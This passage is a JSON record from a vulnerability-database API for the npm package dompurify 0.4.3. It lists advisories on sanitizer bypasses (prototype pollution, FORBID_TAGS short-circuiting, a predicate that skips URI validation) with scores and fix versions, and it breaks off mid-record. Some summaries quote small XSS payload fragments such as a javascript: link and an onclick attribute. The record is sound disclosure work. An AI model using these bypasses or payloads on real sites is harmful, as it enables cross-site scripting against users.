Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/447249?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/447249?format=api", "purl": "pkg:npm/dompurify@0.4.3", "type": "npm", "namespace": "", "name": "dompurify", "version": "0.4.3", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "3.4.0", "latest_non_vulnerable_version": "3.4.5", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359925?format=api", "vulnerability_id": "VCID-37xc-54fs-8fh6", "summary": "DOMPurify's ADD_TAGS function form bypasses FORBID_TAGS due to short-circuit evaluation\n## Summary\nIn `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via `EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to short-circuit evaluation.\n\nThe condition:\n```\n!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])\n```\nWhen `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.\n\n## Inconsistency\nThis contradicts the attribute-side pattern at line 1214 where `FORBID_ATTR` explicitly wins first:\n```\nif (FORBID_ATTR[lcName]) { continue; }\n```\nFor tags, FORBID should also take precedence over ADD.\n\n## Impact\nApplications using both `ADD_TAGS` as a function and `FORBID_TAGS` simultaneously get unexpected behavior — forbidden tags are allowed through. 
Config-dependent but a genuine logic inconsistency.\n\n## Suggested Fix\nCheck `FORBID_TAGS` before `tagCheck`:\n```\nif (FORBID_TAGS[tagName]) { /* remove */ }\nelse if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }\n```\n\n## Affected Version\nv3.3.3 (commit 883ac15)", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp" }, { "reference_url": "https://github.com/advisories/GHSA-39q2-94rc-95cp", "reference_id": "GHSA-39q2-94rc-95cp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-39q2-94rc-95cp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373307?format=api", "purl": "pkg:npm/dompurify@3.4.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0" } ], "aliases": [ "GHSA-39q2-94rc-95cp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-37xc-54fs-8fh6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81082?format=api", "vulnerability_id": "VCID-3fxk-2qcb-jfa3", "summary": "DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used. 
Commit c361baa added an early exit for FORBID_ATTR at line 1214. The same fix was not applied to FORBID_TAGS. At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41240", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04347", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04346", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04355", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04359", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41240" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892", "reference_id": "1134892", "reference_type": "", "scores": [], "url": 
"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147", "reference_id": "2461147", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147" }, { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0", "reference_id": "3.4.0", "reference_type": "", "scores": [ { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80", "reference_id": "c361baa18dbdcb3344a41110f4c48ad85bf48f80", "reference_type": "", "scores": [ { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80" }, { "reference_url": "https://github.com/advisories/GHSA-h7mw-gpvr-xq4m", "reference_id": "GHSA-h7mw-gpvr-xq4m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": 
"https://github.com/advisories/GHSA-h7mw-gpvr-xq4m" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m", "reference_id": "GHSA-h7mw-gpvr-xq4m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:16476", "reference_id": "RHSA-2026:16476", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:16476" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:21338", "reference_id": "RHSA-2026:21338", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:21338" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:21772", "reference_id": "RHSA-2026:21772", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:21772" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:22619", "reference_id": "RHSA-2026:22619", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:22619" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:24977", "reference_id": "RHSA-2026:24977", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:24977" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373307?format=api", 
"purl": "pkg:npm/dompurify@3.4.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0" } ], "aliases": [ "CVE-2026-41240", "GHSA-h7mw-gpvr-xq4m" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3fxk-2qcb-jfa3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/40257?format=api", "vulnerability_id": "VCID-56ww-dvtp-8uc2", "summary": "DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. It has been discovered that malicious HTML using special nesting techniques can bypass the depth checking added to DOMPurify in recent releases. It was also possible to use Prototype Pollution to weaken the depth check. This renders dompurify unable to avoid cross site scripting (XSS) attacks. This issue has been addressed in versions 2.5.4 and 3.1.3 of DOMPurify. All users are advised to upgrade. 
There are no known workarounds for this vulnerability.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45801", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26786", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26788", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26802", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26586", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45801" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", "reference_id": "1e520262bf4c66b5efda49e2316d6d1246ca7b21", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21" }, { 
"reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", "reference_id": "2312631", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", "reference_id": "26e1d69ca7f769f5c558619d644d90dd8bf26ebc", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", "reference_id": "CVE-2024-45801", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801" }, { "reference_url": "https://github.com/advisories/GHSA-mmhx-hmjr-r674", "reference_id": "GHSA-mmhx-hmjr-r674", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mmhx-hmjr-r674" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", 
"reference_id": "GHSA-mmhx-hmjr-r674", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10762", "reference_id": "RHSA-2024:10762", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10762" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:11381", "reference_id": "RHSA-2024:11381", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:11381" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7324", "reference_id": "RHSA-2024:7324", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7324" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7706", "reference_id": "RHSA-2024:7706", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7706" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8014", "reference_id": "RHSA-2024:8014", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8014" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0892", "reference_id": "RHSA-2025:0892", "reference_type": "", "scores": [], "url": 
"https://access.redhat.com/errata/RHSA-2025:0892" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:4019", "reference_id": "RHSA-2025:4019", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:4019" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33397?format=api", "purl": "pkg:npm/dompurify@2.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/33396?format=api", "purl": "pkg:npm/dompurify@3.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3" } ], "aliases": [ "CVE-2024-45801", "GHSA-mmhx-hmjr-r674" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-56ww-dvtp-8uc2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359958?format=api", "vulnerability_id": "VCID-77rz-yewt-77cq", "summary": "DOMPurify 
USE_PROFILES prototype pollution allows event handlers\n## Summary\nWhen `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector.\n\n## Impact\nPrototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security)", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv" }, { "reference_url": "https://github.com/advisories/GHSA-cj63-jhhr-wcxv", "reference_id": "GHSA-cj63-jhhr-wcxv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cj63-jhhr-wcxv" } ], "fixed_packages": [ { "url": 
"http://public2.vulnerablecode.io/api/packages/40110?format=api", "purl": "pkg:npm/dompurify@3.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2" } ], "aliases": [ "GHSA-cj63-jhhr-wcxv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-77rz-yewt-77cq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359752?format=api", "vulnerability_id": "VCID-8tpw-rcyz-xuhu", "summary": "DOMPurify ADD_ATTR predicate skips URI validation\n## Summary\nDOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href=\"javascript:alert(document.domain)\">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. 
The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass.\n\n## Impact\nPredicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security)", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r" }, { "reference_url": "https://github.com/advisories/GHSA-cjmm-f4jc-qw8r", "reference_id": "GHSA-cjmm-f4jc-qw8r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cjmm-f4jc-qw8r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40110?format=api", "purl": "pkg:npm/dompurify@3.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2" } ], "aliases": [ "GHSA-cjmm-f4jc-qw8r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8tpw-rcyz-xuhu" }, { "url": 
"http://public2.vulnerablecode.io/api/vulnerabilities/161221?format=api", "vulnerability_id": "VCID-fp9d-g1ya-qyfx", "summary": "DOMPurify before 1.0.11 allows reverse tabnabbing in demos/hooks-target-blank-demo.html because links lack a 'rel=\"noopener noreferrer\"' attribute.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-25155", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47882", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47897", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.4774", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47881", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-25155" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83" }, { "reference_url": "https://github.com/cure53/DOMPurify/pull/337", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/pull/337" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25155", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25155" }, { "reference_url": "https://github.com/cure53/DOMPurify/compare/1.0.10...1.0.11", "reference_id": "1.0.10...1.0.11", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/" } ], "url": "https://github.com/cure53/DOMPurify/compare/1.0.10...1.0.11" }, { "reference_url": "https://github.com/cure53/DOMPurify/pull/337/files", "reference_id": "files", "reference_type": "", "scores": [ { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/" } ], "url": "https://github.com/cure53/DOMPurify/pull/337/files" }, { "reference_url": "https://github.com/advisories/GHSA-8hgg-xxm5-3873", "reference_id": "GHSA-8hgg-xxm5-3873", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8hgg-xxm5-3873" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/381252?format=api", "purl": "pkg:npm/dompurify@1.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gbb5-2vbk-suh8" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": 
"VCID-nz3k-udjb-3fhz" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.11" } ], "aliases": [ "CVE-2019-25155", "GHSA-8hgg-xxm5-3873" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fp9d-g1ya-qyfx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205198?format=api", "vulnerability_id": "VCID-gbb5-2vbk-suh8", "summary": "Cross-Site Scripting in dompurify", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16728", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00962", "scoring_system": "epss", "scoring_elements": "0.77002", "published_at": "2026-06-12T12:55:00Z" }, { 